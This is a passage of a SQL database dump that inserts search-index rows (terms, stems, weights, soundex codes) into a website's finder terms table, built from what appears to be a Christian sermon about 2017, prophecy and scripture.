(292983, 'the next stage', 'the next stage', 0, 1, 1.4667, 'T523232', 1, '*'),
(292984, 'the truths that', 'the truths that', 0, 1, 1.5, 'T6323', 1, '*'),
(292985, 'them and store', 'them and store', 0, 1, 1.4667, 'T53236', 1, '*'),
(292986, 'them by', 'them by', 0, 1, 1.2333, 'T510', 1, '*'),
(292987, 'them by heart', 'them by heart', 0, 1, 1.4333, 'T5163', 1, '*'),
(292988, 'them memorize', 'them memorize', 0, 1, 1.4333, 'T562', 1, '*'),
(292989, 'them memorize them', 'them memorize them', 0, 1, 1.6, 'T56235', 1, '*'),
(292990, 'then said the', 'then said the', 0, 1, 1.4333, 'T523', 1, '*'),
(292991, 'there 3', 'there 3', 0, 1, 1.2333, 'T600', 1, '*'),
(292992, 'there 3 search', 'there 3 search', 0, 1, 1.4667, 'T6262', 1, '*'),
(292993, 'there is nothing', 'there is nothing', 0, 1, 1.5333, 'T625352', 1, '*'),
(292994, 'these points', 'these points', 0, 1, 1.4, 'T21532', 1, '*'),
(292995, 'these points and', 'these points and', 0, 1, 1.5333, 'T2153253', 1, '*'),
(292996, 'things happen god', 'thing happen god', 0, 1, 1.5667, 'T521523', 1, '*'),
(292997, 'things happen in', 'thing happen in', 0, 1, 1.5333, 'T5215', 1, '*'),
(292998, 'things work at', 'thing work at', 0, 1, 1.4667, 'T52623', 1, '*'),
(292999, 'think that', 'think that', 0, 1, 1.3333, 'T523', 2, '*'),
(293000, 'think that there', 'think that there', 0, 1, 1.5333, 'T5236', 1, '*'),
(293001, 'thou hast well', 'thou hast well', 0, 1, 1.4667, 'T234', 1, '*'),
(293002, 'to accelerate', 'to accelerate', 0, 1, 1.4333, 'T2463', 1, '*'),
(293003, 'to accelerate be', 'to accelerate be', 0, 1, 1.5333, 'T24631', 1, '*'),
(293004, 'to control', 'to control', 0, 1, 1.3333, 'T25364', 1, '*'),
(293005, 'to control and', 'to control and', 0, 1, 1.4667, 'T2536453', 1, '*'),
(293006, 'to declare what', 'to declare what', 0, 1, 1.5, 'T2463', 1, '*'),
(293007, 'to find explanations', 'to find explanations', 0, 1, 1.6667, 'T1532145352', 1, '*'),
(293008, 'to get it', 'to get it', 0, 1, 1.3, 'T230', 1, '*'),
(293009, 'to getting', 'to getting', 0, 1, 1.3333, 'T2352', 1, '*'),
(293010, 'to getting it', 'to getting it', 0, 1, 1.4333, 'T23523', 1, '*'),
(293011, 'to meditate', 'to meditate', 0, 1, 1.3667, 'T530', 1, '*'),
(293012, 'to meditate upon', 'to meditate upon', 0, 1, 1.5333, 'T5315', 1, '*'),
(293013, 'to perform', 'to perform', 0, 1, 1.3333, 'T16165', 1, '*'),
(293014, 'to perform it.”', 'to perform it.”', 0, 1, 1.5, 'T161653', 1, '*'),
(293015, 'to progress', 'to progress', 0, 1, 1.3667, 'T16262', 1, '*'),
(293016, 'to progress to', 'to progress to', 0, 1, 1.4667, 'T162623', 1, '*'),
(293017, 'to say what', 'to say what', 0, 1, 1.3667, 'T230', 1, '*'),
(293018, 'to speak only', 'to speak only', 0, 1, 1.4333, 'T21254', 1, '*'),
(293019, 'to the next', 'to the next', 0, 1, 1.3667, 'T523', 1, '*'),
(293020, 'to work with', 'to work with', 0, 1, 1.4, 'T623', 1, '*'),
(293021, 'too late and', 'too late and', 0, 1, 1.4, 'T4353', 1, '*'),
(293022, 'truths that', 'truth that', 0, 1, 1.3667, 'T6323', 1, '*'),
(293023, 'truths that make', 'truth that make', 0, 1, 1.5333, 'T632352', 1, '*'),
(293024, 'trying to find', 'try to find', 0, 1, 1.4667, 'T6523153', 1, '*'),
(293025, 'understanding the truths', 'understand the truths', 0, 1, 1.8, 'U5362353523632', 1, '*'),
(293026, 'until there', 'until there', 0, 1, 1.3667, 'U53436', 1, '*'),
(293027, 'until there is', 'until there is', 0, 1, 1.4667, 'U534362', 1, '*'),
(293028, 'until you know', 'until you know', 0, 1, 1.4667, 'U53425', 1, '*'),
(293029, 'until you see', 'until you see', 0, 1, 1.4333, 'U5342', 1, '*'),
(293030, 'unto me thou', 'unto me thou', 0, 1, 1.4, 'U5353', 1, '*'),
(293031, 'up your word', 'up your word', 0, 1, 1.4, 'U163', 1, '*'),
(293032, 'upon them', 'upon them', 0, 1, 1.3, 'U1535', 1, '*'),
(293033, 'upon them memorize', 'upon them memorize', 0, 1, 1.6, 'U153562', 1, '*'),
(293034, 'verse 12 says', 'vers 12 says', 0, 1, 1.4333, 'V620', 1, '*'),
(293035, 'wait until', 'wait until', 0, 1, 1.3333, 'W3534', 1, '*'),
(293036, 'wait until there', 'wait until there', 0, 1, 1.5333, 'W353436', 1, '*'),
(293037, 'walk with him', 'walk with him', 0, 1, 1.4333, 'W4235', 2, '*'),
(293038, 'watch your mouth', 'watch your mouth', 0, 1, 1.5333, 'W32653', 1, '*'),
(293039, 'watching for', 'watch for', 0, 1, 1.4, 'W325216', 1, '*'),
(293040, 'watching for his', 'watch for his', 0, 1, 1.5333, 'W3252162', 1, '*'),
(293041, 'watching your', 'watch your', 0, 1, 1.4333, 'W32526', 1, '*'),
(293042, 'watching your complaints', 'watch your complaints', 0, 1, 1.8, 'W325262514532', 1, '*'),
(293043, 'well in church', 'well in church', 0, 1, 1.4667, 'W45262', 1, '*'),
(293044, 'well seen', 'well seen', 0, 1, 1.3, 'W425', 1, '*'),
(293045, 'well seen for', 'well seen for', 0, 1, 1.4333, 'W42516', 1, '*'),
(293046, 'what is in', 'what is in', 0, 1, 1.3333, 'W325', 2, '*'),
(293047, 'what is making', 'what is making', 0, 1, 1.4667, 'W325252', 1, '*'),
(293048, 'when there', 'when there', 0, 1, 1.3333, 'W536', 1, '*'),
(293049, 'when there is', 'when there is', 0, 1, 1.4333, 'W5362', 1, '*'),
(293050, 'which is getting', 'which is getting', 0, 1, 1.5333, 'W2352', 1, '*'),
(293051, 'will attack', 'will attack', 0, 1, 1.3667, 'W432', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(293052, 'will attack what', 'will attack what', 0, 1, 1.5333, 'W4323', 1, '*'),
(293053, 'will come little', 'will come little', 0, 1, 1.5333, 'W425434', 1, '*'),
(293054, 'will do meditate', 'will do meditate', 0, 1, 1.5333, 'W4353', 1, '*'),
(293055, 'will hasten', 'will hasten', 0, 1, 1.3667, 'W4235', 1, '*'),
(293056, 'will hasten my', 'will hasten my', 0, 1, 1.4667, 'W4235', 1, '*'),
(293057, 'will only work', 'will only work', 0, 1, 1.4667, 'W45462', 1, '*'),
(293058, 'with him once', 'with him once', 0, 1, 1.4333, 'W352', 1, '*'),
(293059, 'with his words', 'with his words', 0, 1, 1.4667, 'W32632', 1, '*'),
(293060, 'with you let', 'with you let', 0, 1, 1.4, 'W343', 1, '*'),
(293061, 'without understanding', 'without understanding', 0, 1, 1.7, 'W3536235352', 1, '*'),
(293062, 'without understanding the', 'without understanding the', 0, 1, 1.8333, 'W35362353523', 1, '*'),
(293063, 'word bank', 'word bank', 0, 1, 1.3, 'W63152', 1, '*'),
(293064, 'word bank now', 'word bank now', 0, 1, 1.4333, 'W631525', 1, '*'),
(293065, 'word to perform', 'word to perform', 0, 1, 1.5, 'W6316165', 1, '*'),
(293066, 'word-controlled', 'word-control', 0, 0, 1, 'W63253643', 1, '*'),
(293067, 'word-controlled this', 'word-control this', 0, 1, 1.6667, 'W632536432', 1, '*'),
(293068, 'word-controlled this is', 'word-control this is', 0, 1, 1.7667, 'W632536432', 1, '*'),
(293069, 'words jeremiah', 'word jeremiah', 0, 1, 1.4667, 'W63265', 1, '*'),
(293070, 'words jeremiah 1', 'word jeremiah 1', 0, 1, 1.5333, 'W63265', 1, '*'),
(293071, 'words some', 'word some', 0, 1, 1.3333, 'W6325', 1, '*'),
(293072, 'words some pastors', 'word some pastors', 0, 1, 1.6, 'W632512362', 1, '*'),
(293073, 'work at the', 'work at the', 0, 1, 1.3667, 'W623', 1, '*'),
(293074, 'work with', 'work with', 0, 1, 1.3, 'W623', 1, '*'),
(293075, 'work with his', 'work with his', 0, 1, 1.4333, 'W6232', 1, '*'),
(293076, 'work with you', 'work with you', 0, 1, 1.4333, 'W623', 1, '*'),
(293077, 'you are able', 'you are able', 0, 1, 1.4, 'Y614', 1, '*'),
(293078, 'you are hanging', 'you are hanging', 0, 1, 1.5, 'Y65252', 1, '*'),
(293079, 'you find out', 'you find out', 0, 1, 1.4, 'Y153', 1, '*'),
(293080, 'you know them', 'you know them', 0, 1, 1.4333, 'Y2535', 1, '*'),
(293081, 'you let me', 'you let me', 0, 1, 1.3333, 'Y435', 1, '*'),
(293082, 'you must discipline', 'you must discipline', 0, 1, 1.6333, 'Y5232145', 1, '*'),
(293083, 'you see result', 'you see result', 0, 1, 1.4667, 'Y26243', 1, '*'),
(293084, 'you some', 'you some', 0, 1, 1.2667, 'Y250', 1, '*'),
(293085, 'you some keys', 'you some keys', 0, 1, 1.4333, 'Y252', 1, '*'),
(293086, 'you to get', 'you to get', 0, 1, 1.3333, 'Y323', 1, '*'),
(293087, 'your complaints', 'your complaints', 0, 1, 1.5, 'Y62514532', 1, '*'),
(293088, 'your complaints he', 'your complaints he', 0, 1, 1.6, 'Y62514532', 1, '*'),
(293089, 'your health build', 'your health build', 0, 1, 1.5667, 'Y643143', 1, '*'),
(293090, 'your heart and', 'your heart and', 0, 1, 1.4667, 'Y6353', 1, '*'),
(293091, 'your heart take', 'your heart take', 0, 1, 1.5, 'Y632', 1, '*'),
(293092, 'your heart until', 'your heart until', 0, 1, 1.5333, 'Y63534', 1, '*'),
(293093, 'your mouth learn', 'your mouth learn', 0, 1, 1.5333, 'Y653465', 1, '*'),
(293094, 'your mouth must', 'your mouth must', 0, 1, 1.5, 'Y653523', 1, '*'),
(293095, 'your mouth to', 'your mouth to', 0, 1, 1.4333, 'Y653', 1, '*'),
(293096, 'your mouth your', 'your mouth your', 0, 1, 1.5, 'Y6536', 1, '*'),
(293097, 'your walk', 'your walk', 0, 1, 1.3, 'Y642', 1, '*'),
(293098, 'your walk with', 'your walk with', 0, 1, 1.4667, 'Y6423', 1, '*'),
(293099, 'your word', 'your word', 0, 1, 1.3, 'Y630', 1, '*'),
(293100, 'your word bank', 'your word bank', 0, 1, 1.4667, 'Y63152', 1, '*'),
(293109, '20 fathers', '20 fathers', 0, 1, 1.3333, 'F362', 1, '*'),
(293110, '20 fathers heart', '20 fathers heart', 0, 1, 1.5333, 'F36263', 1, '*'),
(293111, '2017 in', '2017 in', 0, 1, 1.2333, 'I500', 1, '*'),
(293112, '2017 in jesus', '2017 in jesus', 0, 1, 1.4333, 'I520', 1, '*'),
(293113, '2017 new', '2017 new', 0, 1, 1.2667, 'N000', 1, '*'),
(293114, '2017 new heights', '2017 new heights', 0, 1, 1.5333, 'N232', 1, '*'),
(293115, '2017 take', '2017 take', 0, 1, 1.3, 'T200', 1, '*'),
(293116, '2017 take note', '2017 take note', 0, 1, 1.4667, 'T253', 1, '*'),
(293117, '2017 there', '2017 there', 0, 1, 1.3333, 'T600', 1, '*'),
(293118, '2017 there are', '2017 there are', 0, 1, 1.4667, 'T600', 1, '*'),
(293119, '2017”.', '2017”.', 0, 0, 0.4, '”000', 1, '*'),
(293120, '2017”. enlarge', '2017”. enlarge', 0, 1, 1.4667, '”5462', 1, '*'),
(293121, '2017”. enlarge your', '2017”. enlarge your', 0, 1, 1.6333, '”54626', 1, '*'),
(293122, '29 01', '29 01', 0, 1, 1.1667, '', 1, '*'),
(293123, '29 01 2017', '29 01 2017', 0, 1, 1.3333, '', 1, '*'),
(293124, '52 weeks', '52 weeks', 0, 1, 1.2667, 'W200', 1, '*'),
(293125, '52 weeks to', '52 weeks to', 0, 1, 1.3667, 'W230', 1, '*'),
(293126, '84', '84', 0, 0, 0.2, '', 1, '*'),
(293127, '84 days', '84 days', 0, 1, 1.2333, 'D200', 1, '*'),
(293128, '84 days fasting', '84 days fasting', 0, 1, 1.5, 'D212352', 1, '*'),
(293129, 'a lifestyle', 'a lifestyle', 0, 1, 1.3667, 'A41234', 1, '*'),
(293130, 'a lifestyle an', 'a lifestyle an', 0, 1, 1.4667, 'A412345', 1, '*'),
(293131, 'a lot added', 'a lot added', 0, 1, 1.3667, 'A430', 1, '*'),
(293132, 'a partaker', 'a partaker', 0, 1, 1.3333, 'A16326', 1, '*'),
(293133, 'a partaker of', 'a partaker of', 0, 1, 1.4333, 'A163261', 1, '*'),
(293134, 'a visitation', 'a visitation', 0, 1, 1.4, 'A1235', 1, '*'),
(293135, 'a visitation let', 'a visitation let', 0, 1, 1.5333, 'A123543', 1, '*'),
(293136, 'accomplish', 'accomplish', 0, 0, 0.6667, 'A25142', 1, '*'),
(293137, 'accomplish as', 'accomplish as', 0, 1, 1.4333, 'A25142', 1, '*'),
(293138, 'accomplish as we', 'accomplish as we', 0, 1, 1.5333, 'A25142', 1, '*'),
(293139, 'according to this', 'accord to this', 0, 1, 1.5667, 'A2635232', 1, '*'),
(293140, 'achieve', 'achiev', 0, 0, 0.4667, 'A210', 1, '*'),
(293141, 'achieve and', 'achiev and', 0, 1, 1.3667, 'A2153', 1, '*'),
(293142, 'achieve and accomplish', 'achiev and accomplish', 0, 1, 1.7333, 'A215325142', 1, '*'),
(293143, 'added unto', 'ad unto', 0, 1, 1.3333, 'A353', 1, '*'),
(293144, 'added unto us', 'ad unto us', 0, 1, 1.4333, 'A3532', 1, '*'),
(293145, 'all mistakes', 'all mistakes', 0, 1, 1.4, 'A45232', 1, '*'),
(293146, 'all mistakes or', 'all mistakes or', 0, 1, 1.5, 'A452326', 1, '*'),
(293147, 'all the prophetic', 'all the prophetic', 0, 1, 1.5667, 'A4316132', 1, '*'),
(293148, 'also among', 'also among', 0, 1, 1.3333, 'A4252', 1, '*'),
(293149, 'also among theprophet', 'also among theprophet', 0, 1, 1.7, 'A425231613', 1, '*'),
(293150, 'also moved', 'also moved', 0, 1, 1.3333, 'A42513', 1, '*'),
(293151, 'also moved and', 'also moved and', 0, 1, 1.4667, 'A4251353', 1, '*'),
(293152, 'always refer', 'alwai refer', 0, 1, 1.4, 'A42616', 1, '*'),
(293153, 'always refer to', 'alwai refer to', 0, 1, 1.5, 'A426163', 1, '*'),
(293154, 'among theprophet', 'among theprophet', 0, 1, 1.5333, 'A5231613', 1, '*'),
(293155, 'among theprophet he', 'among theprophet he', 0, 1, 1.6333, 'A5231613', 1, '*'),
(293156, 'an anointing', 'an anointing', 0, 1, 1.4, 'A5352', 3, '*'),
(293157, 'an anointing for', 'an anointing for', 0, 1, 1.5333, 'A535216', 1, '*'),
(293158, 'an ongoing', 'an ongoing', 0, 1, 1.3333, 'A5252', 1, '*'),
(293159, 'an ongoing experience', 'an ongoing experience', 0, 1, 1.7, 'A52521652', 1, '*'),
(293160, 'ancestry', 'ancestri', 0, 0, 0.5333, 'A5236', 1, '*'),
(293161, 'ancestry you', 'ancestri you', 0, 1, 1.4, 'A5236', 1, '*'),
(293162, 'ancestry you are', 'ancestri you are', 0, 1, 1.5333, 'A5236', 1, '*'),
(293163, 'and accomplish', 'and accomplish', 0, 1, 1.4667, 'A5325142', 1, '*'),
(293164, 'and accomplish as', 'and accomplish as', 0, 1, 1.5667, 'A5325142', 1, '*'),
(293165, 'and always', 'and always', 0, 1, 1.3333, 'A5342', 1, '*'),
(293166, 'and always refer', 'and always refer', 0, 1, 1.5333, 'A5342616', 1, '*'),
(293167, 'and forward those', 'and forward those', 0, 1, 1.5667, 'A531632', 1, '*'),
(293168, 'and prayers', 'and prayers', 0, 1, 1.3667, 'A53162', 1, '*'),
(293169, 'and prayers you', 'and prayers you', 0, 1, 1.5, 'A53162', 1, '*'),
(293170, 'and re-introduce', 'and re-introduce', 0, 1, 1.5333, 'A53653632', 1, '*'),
(293171, 'and re-introduce them', 'and re-introduce them', 0, 1, 1.7, 'A5365363235', 1, '*'),
(293172, 'and soon', 'and soon', 0, 1, 1.2667, 'A5325', 1, '*'),
(293173, 'and soon your', 'and soon your', 0, 1, 1.4333, 'A53256', 1, '*'),
(293174, 'and the little', 'and the little', 0, 1, 1.4667, 'A53434', 1, '*'),
(293175, 'and there are', 'and there are', 0, 1, 1.4333, 'A536', 1, '*'),
(293176, 'and they never', 'and they never', 0, 1, 1.4667, 'A53516', 1, '*'),
(293177, 'anointing for breaking', 'anoint for breaking', 0, 1, 1.7333, 'A53521616252', 1, '*'),
(293178, 'are a lot', 'ar a lot', 0, 1, 1.3, 'A643', 1, '*'),
(293179, 'are breaking', 'ar breaking', 0, 1, 1.4, 'A616252', 1, '*'),
(293180, 'are breaking new', 'ar breaking new', 0, 1, 1.5333, 'A6162525', 1, '*'),
(293181, 'are going higher', 'ar going higher', 0, 1, 1.5333, 'A62526', 1, '*'),
(293182, 'are new', 'ar new', 0, 1, 1.2333, 'A650', 1, '*'),
(293183, 'are new things', 'ar new things', 0, 1, 1.4667, 'A65352', 1, '*'),
(293184, 'are prophesying', 'ar prophesying', 0, 1, 1.5, 'A6161252', 1, '*'),
(293185, 'are prophesying it', 'ar prophesying it', 0, 1, 1.6, 'A61612523', 1, '*'),
(293186, 'are tapping', 'ar tapping', 0, 1, 1.3667, 'A63152', 1, '*'),
(293187, 'are tapping into', 'ar tapping into', 0, 1, 1.5333, 'A6315253', 1, '*'),
(293188, 'are their', 'ar their', 0, 1, 1.3, 'A636', 1, '*'),
(293189, 'are their only', 'ar their only', 0, 1, 1.4667, 'A63654', 1, '*'),
(293190, 'as you prophesy', 'as you prophesy', 0, 1, 1.5, 'A21612', 1, '*'),
(293191, 'as you speak', 'as you speak', 0, 1, 1.4, 'A212', 1, '*'),
(293192, 'attacks of', 'attack of', 0, 1, 1.3333, 'A321', 1, '*'),
(293193, 'attacks of the', 'attack of the', 0, 1, 1.4667, 'A3213', 1, '*'),
(293194, 'back the', 'back the', 0, 1, 1.2667, 'B230', 1, '*'),
(293195, 'back the mountains', 'back the mountains', 0, 1, 1.6, 'B235352', 1, '*'),
(293196, 'barriers', 'barrier', 0, 0, 0.5333, 'B620', 1, '*'),
(293197, 'barriers in', 'barrier in', 0, 1, 1.3667, 'B625', 1, '*'),
(293198, 'barriers in 2017', 'barrier in 2017', 0, 1, 1.5333, 'B625', 1, '*'),
(293199, 'be a lifestyle', 'be a lifestyle', 0, 1, 1.4667, 'B41234', 1, '*'),
(293200, 'be complete in', 'be complete in', 0, 1, 1.4667, 'B251435', 1, '*'),
(293201, 'be just', 'be just', 0, 1, 1.2333, 'B230', 1, '*'),
(293202, 'be just a', 'be just a', 0, 1, 1.3, 'B230', 1, '*'),
(293203, 'be “be', 'be “be', 0, 1, 1.2, 'B000', 1, '*'),
(293204, 'be “be it', 'be “be it', 0, 1, 1.3, 'B300', 1, '*'),
(293205, 'be “thou', 'be “thou', 0, 1, 1.2667, 'B300', 1, '*'),
(293206, 'be “thou saith', 'be “thou saith', 0, 1, 1.4667, 'B323', 1, '*'),
(293207, 'been done', 'been done', 0, 1, 1.3, 'B535', 2, '*'),
(293208, 'been done before', 'been done before', 0, 1, 1.5333, 'B53516', 1, '*'),
(293209, 'before in', 'befor in', 0, 1, 1.3, 'B650', 1, '*'),
(293210, 'before in your', 'befor in your', 0, 1, 1.4667, 'B656', 1, '*'),
(293211, 'bible says when', 'bibl says when', 0, 1, 1.5, 'B425', 1, '*'),
(293212, 'breaking', 'break', 0, 0, 0.5333, 'B6252', 1, '*'),
(293213, 'breaking new', 'break new', 0, 1, 1.4, 'B62525', 1, '*'),
(293214, 'breaking new barriers', 'break new barriers', 0, 1, 1.7, 'B62525162', 1, '*'),
(293215, 'breaking new grounds', 'break new grounds', 0, 1, 1.6667, 'B6252526532', 1, '*'),
(293216, 'building my', 'build my', 0, 1, 1.3667, 'B43525', 1, '*'),
(293217, 'building my hands', 'build my hands', 0, 1, 1.5667, 'B4352532', 1, '*'),
(293218, 'but i pray', 'but i pray', 0, 1, 1.3333, 'B316', 1, '*'),
(293219, 'but we', 'but we', 0, 1, 1.2, 'B300', 1, '*'),
(293220, 'but we are', 'but we are', 0, 1, 1.3333, 'B360', 1, '*'),
(293221, 'by prophecy', 'by prophecy', 0, 1, 1.3667, 'B612', 1, '*'),
(293222, 'by prophecy this', 'by prophecy this', 0, 1, 1.5333, 'B61232', 1, '*'),
(293223, 'can rearrange', 'can rearrange', 0, 1, 1.4333, 'C5652', 1, '*'),
(293224, 'can rearrange your', 'can rearrange your', 0, 1, 1.6, 'C56526', 1, '*'),
(293225, 'cloud', 'cloud', 0, 0, 0.3333, 'C430', 1, '*'),
(293226, 'cloud didn\'t', 'cloud didn', 0, 1, 1.4, 'C4353', 1, '*'),
(293227, 'cloud didn\'t move', 'cloud didn move', 0, 1, 1.5667, 'C435351', 1, '*'),
(293228, 'cloud in', 'cloud in', 0, 1, 1.2667, 'C435', 1, '*'),
(293229, 'cloud in 2017', 'cloud in 2017', 0, 1, 1.4333, 'C435', 1, '*'),
(293230, 'cloud moved', 'cloud moved', 0, 1, 1.3667, 'C43513', 1, '*'),
(293231, 'cloud moved they', 'cloud moved they', 0, 1, 1.5333, 'C43513', 1, '*'),
(293232, 'cloud moved upward', 'cloud moved upward', 0, 1, 1.6, 'C43513163', 1, '*'),
(293233, 'cloud not', 'cloud not', 0, 1, 1.3, 'C4353', 1, '*'),
(293234, 'cloud not everybody', 'cloud not everybody', 0, 1, 1.6333, 'C43531613', 1, '*'),
(293235, 'cloud there', 'cloud there', 0, 1, 1.3667, 'C436', 1, '*'),
(293236, 'cloud there is', 'cloud there is', 0, 1, 1.4667, 'C4362', 1, '*'),
(293237, 'complete his', 'complet his', 0, 1, 1.4, 'C51432', 1, '*'),
(293238, 'complete his job', 'complet his job', 0, 1, 1.5333, 'C514321', 1, '*'),
(293239, 'complete in', 'complet in', 0, 1, 1.3667, 'C51435', 1, '*'),
(293240, 'complete in 2017', 'complet in 2017', 0, 1, 1.5333, 'C51435', 1, '*'),
(293241, 'confession be', 'confess be', 0, 1, 1.4333, 'C51251', 1, '*'),
(293242, 'confession be “be', 'confess be “be', 0, 1, 1.5667, 'C51251', 1, '*'),
(293243, 'confession this', 'confess this', 0, 1, 1.5, 'C512532', 1, '*'),
(293244, 'confession this year', 'confess this year', 0, 1, 1.6667, 'C5125326', 1, '*'),
(293245, 'continue you', 'continu you', 0, 1, 1.4, 'C535', 1, '*'),
(293246, 'continue you can', 'continu you can', 0, 1, 1.5333, 'C53525', 1, '*'),
(293247, 'days fasting', 'dai fasting', 0, 1, 1.4, 'D212352', 1, '*'),
(293248, 'days fasting and', 'dai fasting and', 0, 1, 1.5333, 'D21235253', 1, '*'),
(293249, 'decide your', 'decid your', 0, 1, 1.3667, 'D236', 1, '*'),
(293250, 'decide your experiences', 'decid your experiences', 0, 1, 1.7667, 'D23621652', 1, '*'),
(293251, 'declarations', 'declar', 0, 0, 0.8, 'D246352', 1, '*'),
(293252, 'declarations god', 'declar god', 0, 1, 1.5333, 'D2463523', 1, '*'),
(293253, 'declarations god has', 'declar god has', 0, 1, 1.6667, 'D24635232', 1, '*'),
(293254, 'declaring', 'declar', 0, 0, 0.6, 'D24652', 1, '*'),
(293255, 'declaring them', 'declar them', 0, 1, 1.4667, 'D2465235', 1, '*'),
(293256, 'declaring them when', 'declar them when', 0, 1, 1.6333, 'D2465235', 1, '*'),
(293257, 'despite all', 'despit all', 0, 1, 1.3667, 'D2134', 1, '*'),
(293258, 'despite all mistakes', 'despit all mistakes', 0, 1, 1.6667, 'D21345232', 1, '*'),
(293259, 'didn\'t move', 'didn move', 0, 1, 1.3667, 'D5351', 1, '*'),
(293260, 'didn\'t move when', 'didn move when', 0, 1, 1.5333, 'D53515', 1, '*'),
(293261, 'directions they', 'direct they', 0, 1, 1.5, 'D623523', 1, '*'),
(293262, 'directions they didn\'t', 'direct they didn', 0, 1, 1.7333, 'D62352353', 1, '*'),
(293263, 'don\'t let yours', 'don let yours', 0, 1, 1.5, 'D534362', 1, '*'),
(293264, 'done before', 'done before', 0, 1, 1.3667, 'D516', 1, '*'),
(293265, 'done before in', 'done before in', 0, 1, 1.4667, 'D5165', 1, '*'),
(293266, 'down but', 'down but', 0, 1, 1.2667, 'D513', 1, '*'),
(293267, 'down but we', 'down but we', 0, 1, 1.3667, 'D513', 1, '*'),
(293268, 'driven back', 'driven back', 0, 1, 1.3667, 'D61512', 1, '*'),
(293269, 'driven back the', 'driven back the', 0, 1, 1.5, 'D615123', 1, '*'),
(293270, 'egypt the', 'egypt the', 0, 1, 1.3, 'E213', 1, '*'),
(293271, 'egypt the glory', 'egypt the glory', 0, 1, 1.5, 'E213246', 1, '*'),
(293272, 'enemy it', 'enemi it', 0, 1, 1.2667, 'E530', 1, '*'),
(293273, 'enemy it was', 'enemi it was', 0, 1, 1.4, 'E532', 1, '*'),
(293274, 'enjoy the', 'enjoi the', 0, 1, 1.3, 'E523', 1, '*'),
(293275, 'enjoy the works', 'enjoi the works', 0, 1, 1.5, 'E52362', 1, '*'),
(293276, 'enlarge', 'enlarg', 0, 0, 0.4667, 'E5462', 1, '*'),
(293277, 'enlarge your', 'enlarg your', 0, 1, 1.4, 'E54626', 1, '*'),
(293278, 'enlarge your faith', 'enlarg your faith', 0, 1, 1.6, 'E5462613', 1, '*'),
(293279, 'everybody moves', 'everybodi moves', 0, 1, 1.5, 'E1613512', 1, '*'),
(293280, 'everybody moves with', 'everybodi moves with', 0, 1, 1.6667, 'E16135123', 1, '*'),
(293281, 'everybody sees', 'everybodi sees', 0, 1, 1.4667, 'E16132', 1, '*'),
(293282, 'everybody sees the', 'everybodi sees the', 0, 1, 1.6, 'E161323', 1, '*'),
(293283, 'experience with', 'experi with', 0, 1, 1.5, 'E216523', 1, '*'),
(293284, 'experience with you', 'experi with you', 0, 1, 1.6333, 'E216523', 1, '*'),
(293285, 'experiences in', 'experi in', 0, 1, 1.4667, 'E216525', 1, '*'),
(293286, 'experiences in 2017', 'experi in 2017', 0, 1, 1.6333, 'E216525', 1, '*'),
(293287, 'fasting and prayers', 'fast and prayers', 0, 1, 1.6333, 'F235253162', 1, '*'),
(293288, 'father\'s heart 29', 'father heart 29', 0, 1, 1.5667, 'F36263', 1, '*'),
(293289, 'fathers heart', 'father heart', 0, 1, 1.4333, 'F36263', 1, '*'),
(293290, 'fathers heart 29', 'father heart 29', 0, 1, 1.5333, 'F36263', 1, '*'),
(293291, 'finish', 'finish', 0, 0, 0.4, 'F520', 1, '*'),
(293292, 'finish it', 'finish it', 0, 1, 1.3, 'F523', 1, '*'),
(293293, 'finish it i', 'finish it i', 0, 1, 1.3667, 'F523', 1, '*'),
(293294, 'fled jordan', 'fled jordan', 0, 1, 1.3667, 'F432635', 1, '*'),
(293295, 'fled jordan was', 'fled jordan was', 0, 1, 1.5, 'F4326352', 1, '*'),
(293296, 'for breaking', 'for breaking', 0, 1, 1.4, 'F616252', 1, '*'),
(293297, 'for breaking new', 'for breaking new', 0, 1, 1.5333, 'F6162525', 1, '*'),
(293298, 'for us new', 'for us new', 0, 1, 1.3333, 'F625', 1, '*'),
(293299, 'forward those', 'forward those', 0, 1, 1.4333, 'F632', 1, '*'),
(293300, 'forward those are', 'forward those are', 0, 1, 1.5667, 'F6326', 1, '*'),
(293301, 'foundation of', 'foundat of', 0, 1, 1.4333, 'F5351', 1, '*'),
(293302, 'foundation of this', 'foundat of this', 0, 1, 1.6, 'F535132', 1, '*'),
(293303, 'glory but', 'glori but', 0, 1, 1.3, 'G4613', 1, '*'),
(293304, 'glory but i', 'glori but i', 0, 1, 1.3667, 'G4613', 1, '*'),
(293305, 'glory by', 'glori by', 0, 1, 1.2667, 'G461', 1, '*'),
(293306, 'glory by prophecy', 'glori by prophecy', 0, 1, 1.5667, 'G461612', 1, '*'),
(293307, 'glory cloud', 'glori cloud', 0, 1, 1.3667, 'G46243', 1, '*'),
(293308, 'glory cloud didn\'t', 'glori cloud didn', 0, 1, 1.6, 'G4624353', 1, '*'),
(293309, 'glory cloud in', 'glori cloud in', 0, 1, 1.4667, 'G462435', 1, '*'),
(293310, 'glory cloud moved', 'glori cloud moved', 0, 1, 1.5667, 'G46243513', 1, '*'),
(293311, 'glory cloud not', 'glori cloud not', 0, 1, 1.5, 'G4624353', 1, '*'),
(293312, 'glory cloud there', 'glori cloud there', 0, 1, 1.5667, 'G462436', 1, '*'),
(293313, 'glory it', 'glori it', 0, 1, 1.2667, 'G463', 1, '*'),
(293314, 'glory it fled', 'glori it fled', 0, 1, 1.4333, 'G463143', 1, '*'),
(293315, 'go down but', 'go down but', 0, 1, 1.3667, 'G3513', 1, '*'),
(293316, 'god proceed', 'god proceed', 0, 1, 1.3667, 'G31623', 1, '*'),
(293317, 'god proceed out', 'god proceed out', 0, 1, 1.5, 'G31623', 1, '*'),
(293318, 'going higher', 'go higher', 0, 1, 1.4, 'G526', 1, '*'),
(293319, 'going higher new', 'go higher new', 0, 1, 1.5333, 'G5265', 1, '*'),
(293320, 'grounds nehemiah', 'ground nehemiah', 0, 1, 1.5333, 'G65325', 1, '*'),
(293321, 'grounds nehemiah took', 'ground nehemiah took', 0, 1, 1.7, 'G6532532', 1, '*'),
(293322, 'grounds shattering', 'ground shattering', 0, 1, 1.6, 'G65323652', 1, '*'),
(293323, 'grounds shattering new', 'ground shattering new', 0, 1, 1.7333, 'G653236525', 1, '*'),
(293324, 'grounds what', 'ground what', 0, 1, 1.4, 'G65323', 1, '*'),
(293325, 'grounds what you', 'ground what you', 0, 1, 1.5333, 'G65323', 1, '*'),
(293326, 'hands have', 'hand have', 0, 1, 1.3333, 'H5321', 1, '*'),
(293327, 'hands have laid', 'hand have laid', 0, 1, 1.5, 'H532143', 1, '*'),
(293328, 'hands will', 'hand will', 0, 1, 1.3333, 'H5324', 1, '*'),
